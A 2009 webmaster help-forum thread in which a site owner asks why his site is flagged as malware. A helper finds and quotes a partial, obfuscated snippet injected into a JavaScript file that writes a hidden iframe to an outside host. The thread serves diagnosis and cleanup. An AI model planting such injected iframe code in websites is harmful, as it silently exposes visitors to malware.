/webmasters/community?hl=en
/webmasters/community?hl=en
6/20/09
Original Poster
yashvin

yashvinawootar.com has been marked as malware

Hello everyone.
 
I have a personal web site which has been running without any modifications done since months. However, suddenly, the site has been marked as malware and I have checked every code, even ftp dates show that no modification have been made since months.
 
I read the guidelines, and I can see that redirects are sometimes considered as malware.
I have an old domain which redirects to my new site http://www.yashvinawootar.com which itself redirects to a sub folder on which my site lies.
 
Does those redirects have something to do? I have sumitted review requests, but I still have the same problem.
Thanks in advance,
 
Cheers from Mauritius.
Yashvin
Community content may not be verified or up-to-date. Learn more.
Recommended Answer
Was this answer helpful?
How can we improve it?
All Replies (5)
Denis
6/20/09
Denis
Hi,

Check the  "/mypages/js/scriptaculous.js?
load=effects" script file. At the bottom, you will find a piece of malicious code that injects a hidden iframe from "gcounter cn"

Here are the malicious strings
---------------
if (document.cookie.search("coqwg=3") == -1) {
document.write("<i"+"fr"+"ame sr"+"c=http:"+"//"+"gcou"+"nter"+......
document.cookie = "coqwg=3;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}

---------------

6/20/09
Original Poster
yashvin
Hi Denis.
 
Thanks for ur reply but is this The source?
I mean, I have not modified the file in any way since months.
 
Anyway, I have commented the code.
Lets hope it works, I will be requesting another review from google.
 
Thanks again!
Denis
6/20/09
Denis
http://www.google.com/safebrowsing/diagnostic?site=yashvinawootar.com
Google says that the problem is in "gcounter cn". So yes, this is the source.

6/20/09
Original Poster
yashvin
Yes, lets hope there isnt any other such scripts hidden somewhere.
 
You have really fascinated me.
As a young software engineer, I would be grateful to you if you can tell me how you scanned the content to find that code hidden and broken down into pieces?
That would really interest me!
Denis
6/21/09
Denis
I used the NoScript Firefox extension which warned me about external script from gcounter. The rest was a matter of scanning all file that the page loaded.

Note, I did this on a Linux machine to minimize risk of being infected.
 
This question is locked and replying has been disabled. Still have questions? Ask the Help Community.

Badges

Some community members might have badges that indicate their identity or level of participation in a community.

 
Expert - Google Employee — Googler guides and community managers
 
Expert - Community Specialist — Google partners who share their expertise
 
Expert - Gold — Trusted members who are knowledgeable and active contributors
 
Expert - Platinum — Seasoned members who contribute beyond providing help through mentoring, creating content, and more
 
Expert - Alumni — Past members who are no longer active, but were previously recognized for their helpfulness
 
Expert - Silver — New members who are developing their product knowledge
Community content may not be verified or up-to-date. Learn more.

Levels

Member levels indicate a user's level of participation in a forum. The greater the participation, the higher the level. Everyone starts at level 1 and can rise to level 10. These activities can increase your level in a forum:

  • Post an answer.
  • Having your answer selected as the best answer.
  • Having your post rated as helpful.
  • Vote up a post.
  • Correctly mark a topic or post as abuse.

Having a post marked and removed as abuse will slow a user's advance in levels.

View profile in forum?

To view this member's profile, you need to leave the current Help page.

Report abuse in forum?

This comment originated in the Google Product Forum. To report abuse, you need to leave the current Help page.

Reply in forum?

This comment originated in the Google Product Forum. To reply, you need to leave the current Help page.